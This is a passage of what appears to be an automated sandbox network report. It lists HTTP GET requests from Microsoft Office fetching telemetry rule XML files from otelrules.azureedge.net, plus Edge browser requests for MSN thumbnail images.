Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
